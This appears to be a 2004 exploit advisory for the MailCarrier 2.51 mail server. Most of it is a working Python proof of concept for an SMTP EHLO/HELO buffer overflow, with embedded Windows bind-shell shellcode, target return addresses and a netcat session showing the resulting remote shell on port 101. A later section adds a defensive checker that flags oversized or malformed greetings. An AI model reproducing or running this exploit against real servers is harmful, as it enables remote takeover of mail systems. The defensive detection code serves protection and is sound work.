mailcarrier.txt

27 Oct 2004 | Reported by muts | Type: packetstorm | Source: packetstormsecurity.com

MailCarrier is a secure mail server supporting SSL and anti-spam with multi-domain capabilities.

Code
`  
  
ABOUT :  
  
MailCarrier is a full-featured mail server with the latest security and anti-spam functions. It supports SSL communication and SMTP/POP3 authentication methods based on SASL and NTLM that do not transmit messages and/or passwords in clear text. Many spam mails can be blocked through inquiry of the sender's address, inquiry of RBL, filtering of message content, and so on.  
MailCarrier provides you with various methods for running multiple domains. It can execute a mail server instance per domain on a single computer; you can run lots of mail servers without them interfering with each other. In addition, you can make as many virtual domains and alias domains per mail server instance as you want. For each domain and instance, you can build an individual spam policy and security policy.  
  
http://www.tabslab.com/en/product/mailcarrier20/  
  
  
THE POC :  
  
#########################################################  
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow #  
# Advanced, secure and easy to use FTP Server. #  
# 23 Oct 2004 - muts #  
#########################################################  
# D:\BO>mailcarrier-2.5-EHLO.py #  
#########################################################  
# D:\data\tools>nc -v 192.168.1.32 101 #  
# localhost [127.0.0.1] 101 (hostname) open #  
# Microsoft Windows 2000 [Version 5.00.2195] #  
# (C) Copyright 1985-2000 Microsoft Corp. #  
# C:\WINNT\system32> #  
#########################################################  
  
import struct  
import socket  
  
print "\n\n###############################################"  
print "\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow"  
print "\nFound & coded by muts [at] whitehat.co.il"  
print "\nFor Educational Purposes Only!\n"   
print "\n\n###############################################"  
  
def make_overflow_dummy(overflow_len, retaddr):  
    return 'A' * overflow_len + struct.pack('<L', retaddr)  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
sc2 = "\xEB"  
sc2 += "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"  
sc2 += "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"  
sc2 += "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"  
sc2 += "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"  
sc2 += "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"  
sc2 += "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"  
sc2 += "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"  
sc2 += "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"  
sc2 += "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"  
sc2 += "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"  
sc2 += "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"  
sc2 += "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"  
sc2 += "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"  
sc2 += "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"  
sc2 += "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"  
sc2 += "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"  
sc2 += "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"  
sc2 += "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"  
sc2 += "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"  
sc2 += "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"  
sc2 += "\x58\x68\x61\x63\x6B\x90"  
  
# Change RET address as need be.  
  
#buffer = make_overflow_dummy(5093, 0x7c2ee21b) + '\x90' * 32 + sc2 # RET Win2000 SP4 ENG  
buffer = make_overflow_dummy(5097, 0x7d17dd13) + '\x41' * 32 + sc2 #RET WinXP SP2 ENG  
  
try:  
    print "\nSending evil buffer..."  
    s.connect(('127.0.0.1',25))  
    s.send('EHLO ' + buffer + '\r\n')  
    data = s.recv(1024)  
    s.close()  
    print "\nDone! Try connecting to port 101 on victim machine."  
except:  
    print "Could not connect to SMTP!"  
  
  
INFOS :  
  
It works as is, but you might want to change the part after the EIP to NOPs in the following way... just for aesthetics' sake:  
  
buffer = make_overflow_dummy(5097, 0x7d17dd13) + '\x90' * 32 + sc2 #RET WinXP SP2 ENG  
  
  
  
Regards to muts & the whitehat's folks  
Jerome ATHIAS  
`
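
On the defensive side, the request above stands out by size alone: its EHLO argument is more than 5,000 bytes, while RFC 5321 caps a command line at 512 octets and a domain at 255. The following check is an added example (not part of the original advisory or of MailCarrier); the function names and the sample session are constructed for illustration.

```python
import re

# RFC 5321 section 4.5.3.1 limits: a command line is at most 512 octets
# including CRLF, and a domain is at most 255 octets.
MAX_COMMAND_LINE = 512
MAX_DOMAIN = 255

GREETING = re.compile(rb"(EHLO|HELO)(?:[ \t]+(.*))?", re.IGNORECASE | re.DOTALL)
# Bytes that can appear in a domain name or an address literal such as [192.0.2.10].
DOMAIN_BYTES = re.compile(rb"[A-Za-z0-9.\-\[\]:]+")


def inspect_greeting(line):
    """Return the reasons a client line is a malformed EHLO/HELO ([] if none)."""
    body = line[:-2] if line.endswith(b"\r\n") else line
    m = GREETING.fullmatch(body)
    if m is None:
        return []  # not a greeting command, out of scope for this check
    arg = m.group(2) or b""
    reasons = []
    if len(body) + 2 > MAX_COMMAND_LINE:  # +2 accounts for the CRLF terminator
        reasons.append("command line exceeds %d octets" % MAX_COMMAND_LINE)
    if len(arg) > MAX_DOMAIN:
        reasons.append("argument is %d octets, limit %d" % (len(arg), MAX_DOMAIN))
    if arg and DOMAIN_BYTES.fullmatch(arg) is None:
        reasons.append("argument contains bytes not valid in a domain")
    return reasons


def scan_session(client_lines):
    """Return (line_index, reasons) for every suspicious greeting in a session."""
    checked = ((i, inspect_greeting(line)) for i, line in enumerate(client_lines))
    return [(i, reasons) for i, reasons in checked if reasons]


# Constructed sample session (not captured traffic). The last line mimics only
# the size of the request described above: 5097 filler bytes plus 4 non-ASCII bytes.
SAMPLE = [
    b"EHLO mail.example.org\r\n",
    b"HELO [192.0.2.10]\r\n",
    b"MAIL FROM:<a@example.org>\r\n",
    b"EHLO " + b"A" * 5097 + b"\xff\xfe\xfd\xfc" + b"\r\n",
]

if __name__ == "__main__":
    for index, reasons in scan_session(SAMPLE):
        print(index, "; ".join(reasons))
```

The same length limits can be enforced at an SMTP proxy or gateway in front of a legacy server, so that an oversized greeting is rejected before it reaches the vulnerable parser.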
